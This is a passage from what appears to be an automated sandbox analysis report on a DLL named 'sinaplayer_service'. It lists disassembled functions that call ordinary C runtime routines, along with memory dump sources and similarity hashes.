                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: ed63b4994c3a89f3ec513b349af7bdf55bc979a2067521c0592a908836a15b65
                                                                                                                                                                                                    • Instruction ID: d5cd6fa28ea987c7b6b45dc448d6b0f4e415dcf146f1287ee417fc7ab1d40c24
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed63b4994c3a89f3ec513b349af7bdf55bc979a2067521c0592a908836a15b65
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C001A23141531A9AEB156EA4C8043BF3AA4FF46374F515606F9388E0E0D77584A0EBA2
                                                                                                                                                                                                    Function 6D0ABEC0 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABED7
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94,00000000), ref: 6D0ABEE2
                                                                                                                                                                                                    • _msize.MSVCR120(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF02
                                                                                                                                                                                                      • Part of subcall function 6D09CA0E: HeapSize.KERNEL32(00000000,00000000,?,6D0ABF07,00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?), ref: 6D09CA26
                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF18
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF24
                                                                                                                                                                                                    • _realloc_crt.MSVCR120(00000000,00000800,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1), ref: 6D0ADBFF
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ADC15
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 765448609-0
                                                                                                                                                                                                    • Opcode ID: 3ecd9715f46be8aca2933e3ecf0642f2f2bfa3269eaee8a9cc21c8bb5032460a
                                                                                                                                                                                                    • Instruction ID: 7339c668912bef605d5333bb9ae3124bca1544e565fc6e1e588dd71ea1eecb26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ecd9715f46be8aca2933e3ecf0642f2f2bfa3269eaee8a9cc21c8bb5032460a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501A471510154EFEF01DFA4E984AE9BBFAFB89294344016AE905D7200FBB1DD10DB90
                                                                                                                                                                                                    Function 6D095A09 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6D095A70,0000000C), ref: 6D095A38
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fread_nolock_s.MSVCR120(?,?,?,?,?,6D095A70,0000000C), ref: 6D095A4E
                                                                                                                                                                                                      • Part of subcall function 6D095938: memcpy_s.MSVCR120(?,?,?,?,00000000), ref: 6D0959E0
                                                                                                                                                                                                      • Part of subcall function 6D0958ED: _unlock_file.MSVCR120(?,6D095A67), ref: 6D0958EE
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000000FF,?,?,6D095A70,0000000C), ref: 6D0D5609
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6D095A70,0000000C), ref: 6D0D5611
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,6D095A70,0000000C), ref: 6D0D561C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fread_nolock_s_invalid_parameter_noinfo_lock_lock_file_unlock_filememcpy_smemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4031208221-0
                                                                                                                                                                                                    • Opcode ID: a71b9ae3216d2e894d1144e73799622cd2d6b3c0e87d3f071eb16b09059621cd
                                                                                                                                                                                                    • Instruction ID: 2a41814e88d2a3e6a188a8caca032dfc8bda6927732ab3e786f4ce58eece47bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a71b9ae3216d2e894d1144e73799622cd2d6b3c0e87d3f071eb16b09059621cd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99019E75805606EAEF029F668C04BBE3BA0EF45361B414115F9346B1A0D7318611EF91
                                                                                                                                                                                                    Function 6D093EF3 Relevance: 7.5, APIs: 5, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: 3d03ceb97e035146cf1d81d42cfe83a23d59bf42f57bf77601c3b1369bb9e111
                                                                                                                                                                                                    • Instruction ID: aa619d2c6ffd770995a2ec84d97a481169a49f282488c3d991a7beb07209c049
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d03ceb97e035146cf1d81d42cfe83a23d59bf42f57bf77601c3b1369bb9e111
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2501863541824A9AFB115F69DC047AF3BA4AF1A364F415242FA384F1E4D776C050AFB2
                                                                                                                                                                                                    Function 6D097E9F Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _localtime64_s.MSVCR120(?,?), ref: 6D097ED4
                                                                                                                                                                                                    • asctime.MSVCR120(?), ref: 6D097EE3
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000000,00000000,0000000B,?,00000001), ref: 6D0D6901
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000,00000000,00000000,00000000,0000000B,?,00000001), ref: 6D0D690C
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D6916
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_localtime64_sasctime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1110404623-0
                                                                                                                                                                                                    • Opcode ID: 65606d6633042241a83c80771a3dea30feb6ee38c4f5c370399c7b1c8f5601a5
                                                                                                                                                                                                    • Instruction ID: 6e71ef880d642f4af53002bbaa26db81b58cea54dc5ba9bc9c0ba327bd3bf2f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65606d6633042241a83c80771a3dea30feb6ee38c4f5c370399c7b1c8f5601a5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDF0AF72D0820E9AFB04DFA4D90079EB7ECAF4E314F81246AD5048F490EB74D980AA66
                                                                                                                                                                                                    Function 6D108531 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D108548
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D108553
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D108575
                                                                                                                                                                                                    • _localtime64_s.MSVCR120(?,?), ref: 6D108587
                                                                                                                                                                                                      • Part of subcall function 6D097888: memset.MSVCR120(?,000000FF,00000024), ref: 6D0978AF
                                                                                                                                                                                                      • Part of subcall function 6D097888: _get_daylight.MSVCR120(?), ref: 6D0978EA
                                                                                                                                                                                                      • Part of subcall function 6D097888: _get_dstbias.MSVCR120(?), ref: 6D0978FC
                                                                                                                                                                                                      • Part of subcall function 6D097888: _get_timezone.MSVCR120(?), ref: 6D09790E
                                                                                                                                                                                                      • Part of subcall function 6D097888: _gmtime64_s.MSVCR120(?,?), ref: 6D097942
                                                                                                                                                                                                      • Part of subcall function 6D097888: _gmtime64_s.MSVCR120(?,?), ref: 6D09796C
                                                                                                                                                                                                    • __wasctime.LIBCMT(?), ref: 6D108596
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_gmtime64_s$__wasctime_get_daylight_get_dstbias_get_timezone_invalid_parameter_invalid_parameter_noinfo_localtime64_smemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959933861-0
                                                                                                                                                                                                    • Opcode ID: 2b08a9a4906fd4dd5d1ed66f14e823914f8adc9b1ec6ebd90304a07953362cda
                                                                                                                                                                                                    • Instruction ID: 06126f1d7ac266e5d04b97b0a5aa9a7584da6c01ac6c06d724623120f947c5ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b08a9a4906fd4dd5d1ed66f14e823914f8adc9b1ec6ebd90304a07953362cda
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF0AF7190C2099FEB00FFA8D81078A77FCAB19318F420466D605DB044EFF0D5408B22
                                                                                                                                                                                                    Function 6D0AC9B5 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _control87.MSVCR120(00000001,?,00000000,?,6D0FCAB9,00000000,00010000,00030000,?,6D0E0802,?,6D0ACCEB,?,?,6D0ACD94,00000000), ref: 6D0AC9E1
                                                                                                                                                                                                    • _control87.MSVCR120(00000000,00000000,00000000,?,6D0FCAB9,00000000,00010000,00030000,?,6D0E0802,?,6D0ACCEB,?,?,6D0ACD94,00000000), ref: 6D0E14C2
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D0FCAB9,00000000,00010000,00030000,?,6D0E0802,?,6D0ACCEB,?,?,6D0ACD94,00000000), ref: 6D0E14CB
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6D0FCAB9,00000000,00010000,00030000,?,6D0E0802,?,6D0ACCEB,?,?,6D0ACD94,00000000), ref: 6D0E14D5
                                                                                                                                                                                                    • _control87.MSVCR120(00000001,?,00000000,?,6D0FCAB9,00000000,00010000,00030000,?,6D0E0802,?,6D0ACCEB,?,?,6D0ACD94,00000000), ref: 6D0E14E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _control87$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1498936549-0
                                                                                                                                                                                                    • Opcode ID: b8281eb09a1cbd4dd0ead9bc02e2e7ab9cc2ae18aa67bca1d8c24307461bbb46
                                                                                                                                                                                                    • Instruction ID: 69d9adb58a4c7bca0094c19cd84bf942eeb1032ea0879d6868c844dfbdd58d3e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8281eb09a1cbd4dd0ead9bc02e2e7ab9cc2ae18aa67bca1d8c24307461bbb46
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0F07665C3199FFB154FA49802B9A73E8FF14B60F16411DFA18AF280DBB1E80042D9
                                                                                                                                                                                                    Function 6D100A89 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D100A96
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D100AA1
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D100ABF
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D100ACA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: 475424ba0e096a867894ab4a8339ffc3ab863acb4e767b1e4831fecb20219b77
                                                                                                                                                                                                    • Instruction ID: 405425c96f7b2bca50a37eef6728b07af3fc5bc43374a3790ea331420e2217fb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 475424ba0e096a867894ab4a8339ffc3ab863acb4e767b1e4831fecb20219b77
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51F0623160420ADBDF05BF76D8406A77378BF2577CB11C255A5288F1D8EFB1D9408BA1
                                                                                                                                                                                                    Function 6D106C01 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D106C18
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D106C23
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D106C3D
                                                                                                                                                                                                    • __localtime32_s.LIBCMT(?,?), ref: 6D106C4F
                                                                                                                                                                                                      • Part of subcall function 6D107269: _errno.MSVCR120(?,?,6D106C54,?,?), ref: 6D107283
                                                                                                                                                                                                      • Part of subcall function 6D107269: _invalid_parameter_noinfo.MSVCR120(?,?,6D106C54,?,?), ref: 6D10728D
                                                                                                                                                                                                    • asctime.MSVCR120(?), ref: 6D106C5E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$__localtime32_s_invalid_parameterasctime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4154182036-0
                                                                                                                                                                                                    • Opcode ID: fab7c2bf6652c0c41c9179ba09a25408d41b061d888389689f1a8e0354cf4a39
                                                                                                                                                                                                    • Instruction ID: 84e1cfd6ad9dfdc8977dfa3bf667e907b444918cc2dcfe04bdd923d8985edcc8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fab7c2bf6652c0c41c9179ba09a25408d41b061d888389689f1a8e0354cf4a39
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FF09071A0820E9FDB04FFB8EA4078A77F8DF09318F02045AD9049B144FFB0D5849BA1
                                                                                                                                                                                                    Function 6D108450 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D108467
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D108472
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10848C
                                                                                                                                                                                                    • __localtime32_s.LIBCMT(?,?), ref: 6D10849E
                                                                                                                                                                                                      • Part of subcall function 6D107269: _errno.MSVCR120(?,?,6D106C54,?,?), ref: 6D107283
                                                                                                                                                                                                      • Part of subcall function 6D107269: _invalid_parameter_noinfo.MSVCR120(?,?,6D106C54,?,?), ref: 6D10728D
                                                                                                                                                                                                    • __wasctime.LIBCMT(?), ref: 6D1084AD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$__localtime32_s__wasctime_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2302537511-0
                                                                                                                                                                                                    • Opcode ID: 550ba597adade6a08d99660996486c28d75789c4223a19235e7d8cd5b58fc580
                                                                                                                                                                                                    • Instruction ID: 5690fdeda0233fe9a54448cc9dda4e4a874a81e458b083b7b0d8c55eedca9b5d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 550ba597adade6a08d99660996486c28d75789c4223a19235e7d8cd5b58fc580
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDF06775A0C20A9FDB00FFB4D84079E7BF8AB0D324F42046AD604DB185EFB498808B61
                                                                                                                                                                                                    Function 6D100B7E Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D100B88
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D100B93
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D100BB7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D100BC2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
